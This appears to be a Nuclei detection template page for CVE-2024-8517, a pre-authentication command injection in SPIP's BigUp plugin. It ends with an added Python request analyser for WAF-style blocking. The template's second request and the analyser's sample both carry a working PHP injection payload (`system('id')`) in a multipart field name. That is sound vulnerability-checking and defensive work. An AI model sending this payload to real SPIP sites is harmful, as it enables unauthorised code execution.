SPIP BigUp Plugin - Remote Code Execution
ID: CVE-2024-8517
Severity: critical
Author: DhiyaneshDk
Tags: cve,cve2024,intrusive,spip,rce
Description
SPIP before 4.3.2, 4.2.16, and 4.1.18 is vulnerable to a command injection issue. A remote and unauthenticated attacker can execute arbitrary operating system commands by sending a crafted multipart file upload HTTP request.
YAML Source
id: CVE-2024-8517

info:
  name: SPIP BigUp Plugin - Remote Code Execution
  author: DhiyaneshDk
  severity: critical
  description: |
    SPIP before 4.3.2, 4.2.16, and 4.1.18 is vulnerable to a command injection issue. A remote and unauthenticated attacker can execute arbitrary operating system commands by sending a crafted multipart file upload HTTP request.
  reference:
    - https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-3-2-SPIP-4-2-16-SPIP-4-1-18.html
    - https://thinkloveshare.com/hacking/spip_preauth_rce_2024_part_2_a_big_upload/
    - https://vulncheck.com/advisories/spip-upload-rce
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-8517
    cwe-id: CWE-646
    epss-score: 0.00045
    epss-percentile: 0.16322
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.favicon.hash:-1224668706
    fofa-query: "X-Spip-Cache"
  tags: cve,cve2024,intrusive,spip,rce

flow: http(1) && http(2)

variables:
  email: "{{randstr}}@{{rand_base(5)}}.com"
  string: "{{randstr}}"
  filename: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        GET /spip.ph%70?pag%65=spip_pass&lang=fr HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'formulaire_action_args'
          - 'spip'
        condition: and
        internal: true

    extractors:
      - type: regex
        part: body
        group: 1
        name: formulaire
        regex:
          - name=['"]formulaire_action_args['"]\s*type=['"]hidden['"]\s*value=['"]([^'"]+)['"]
        internal: true

  - raw:
      - |
        POST /spip.ph%70?pag%65=spip_pass&lang=fr HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=5f02b65945d644d6a32847ab130e9586

        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="page"

        spip_pass
        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="lang"

        fr
        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="formulaire_action"

        oubli
        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="formulaire_action_args"

        {{formulaire}}
        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="formulaire_action_sign"


        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="oubli"

        {{email}}
        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="nobot"


        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="bigup_retrouver_fichiers"

        a
        --5f02b65945d644d6a32847ab130e9586
        Content-Disposition: form-data; name="RCE['.system('id').die().']"; filename="{{filename}}.txt"
        Content-Type: text/plain

        {{string}}
        --5f02b65945d644d6a32847ab130e9586--

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=[0-9]+.*gid=[0-9]+.*"

      - type: status
        status:
          - 200

Guide to check the vulnerabilities
This template detects the vulnerability described above. Run it with the Nuclei tool against the target URL to check for the vulnerable behaviour:
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-8517.yaml"
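From the defender's side, the same request shape the template sends can be recognised at a WAF or in a log-review hook. The following is an added example, not part of the Nuclei template or of SPIP: it decodes the needlessly percent-encoded path, confirms a multipart POST to page=spip_pass, notes the bigup_retrouver_fichiers field, and rejects any multipart part name that is not a plain identifier. The two sample requests, the example.invalid host and the verdict labels are constructed for this example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Field name carried by a multipart part header; a benign SPIP form field name is a
# plain identifier, optionally with [] array keys, never quotes, dots or parentheses.
PART_NAME_RE = re.compile(r'Content-Disposition:\s*form-data;\s*name="([^"]*)"', re.I)
SAFE_NAME_RE = re.compile(r"^[A-Za-z0-9_\-]+(\[[A-Za-z0-9_\-]*\])*$")

def analyse_spip_request(raw: str) -> dict:
    request_line, _, rest = raw.partition("\r\n")
    method, target = request_line.split(" ")[:2]
    headers_blob, _, body = rest.partition("\r\n\r\n")
    headers = {k.strip().lower(): v.strip()
               for k, _, v in (h.partition(":") for h in headers_blob.split("\r\n"))}
    url = urlsplit(target)
    indicators = []
    # Percent-encoding inside a plain ASCII path or parameter name (spip.ph%70, pag%65)
    # only serves to dodge naive string matches; decode before comparing.
    raw_keys = [p.split("=", 1)[0] for p in url.query.split("&") if p]
    if "%" in url.path or any("%" in k for k in raw_keys):
        indicators.append("needless_percent_encoding")
    is_multipart = headers.get("content-type", "").startswith("multipart/form-data")
    if (method == "POST" and unquote(url.path).endswith("/spip.php")
            and parse_qs(url.query).get("page") == ["spip_pass"] and is_multipart):
        indicators.append("multipart_post_to_spip_pass")
    names = PART_NAME_RE.findall(body)
    if "bigup_retrouver_fichiers" in names:
        indicators.append("bigup_retrouver_fichiers_field")
    bad_names = [n for n in names if not SAFE_NAME_RE.match(n)]
    if bad_names:
        indicators.append("code_like_part_name")
    verdict = "block" if bad_names else ("review" if len(indicators) >= 2 else "allow")
    return {"indicators": indicators, "bad_names": bad_names, "verdict": verdict}

BOUNDARY = "5f02b65945d644d6a32847ab130e9586"  # same boundary string as the template
def _part(name, value, extra=""):
    return f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="{name}"{extra}\r\n\r\n{value}\r\n'
def _req(target, *parts):
    return (f"POST {target} HTTP/1.1\r\nHost: example.invalid\r\n"
            f"Content-Type: multipart/form-data; boundary={BOUNDARY}\r\n\r\n"
            + "".join(parts) + f"--{BOUNDARY}--\r\n")
# Constructed samples: one with the shape of the template's second request, and one
# ordinary password-reset submission for comparison.
SAMPLE_ATTACK = _req("/spip.ph%70?pag%65=spip_pass&lang=fr",
    _part("page", "spip_pass"), _part("formulaire_action", "oubli"),
    _part("bigup_retrouver_fichiers", "a"),
    _part("RCE['.system('id').die().']", "x", '; filename="a.txt"\r\nContent-Type: text/plain'))
SAMPLE_BENIGN = _req("/spip.php?page=spip_pass&lang=fr",
    _part("page", "spip_pass"), _part("formulaire_action", "oubli"),
    _part("oubli", "user@example.invalid"))
```

A single indicator on its own (a normal multipart post to the password-reset form) is left alone; a part name that could only be code is enough to block on its own.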